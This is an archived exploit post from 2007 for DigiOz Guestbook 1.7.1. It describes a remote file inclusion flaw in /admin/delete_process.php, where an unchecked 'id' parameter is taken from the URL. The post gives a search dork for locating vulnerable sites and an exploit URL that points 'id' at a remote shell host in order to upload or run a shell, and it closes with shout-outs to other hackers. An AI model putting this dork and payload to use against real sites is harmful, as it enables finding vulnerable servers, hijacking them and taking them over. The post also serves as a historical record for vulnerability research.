Home / exploitsPDF  

digioz-rfi.txt

Posted on 23 April 2007

DigiOz Guestbook 1.7.1 --------------------------- App: DigiOz Guestbook 1.7.1 Source: http://www.digioz.com/guestbook/guestbook.zip Author: Arham Muhammad Dork: "Powered by DigiOz Guestbook Version 1.7.1" Vulnerable File: /admin/delete_process.php Vulnerable Code: $id = $_GET['id']; This Vulnerability Requires Admin Session To Be Present In Order To Exploit This,Later This Vulnerability Can Be Used To Upload Or Execute A Shell! Exploit: http://site/path/admin/delete_process.php?id=http://sh3ll Shouts: USMAN,Hackman,tushy,str0ke,

 

TOP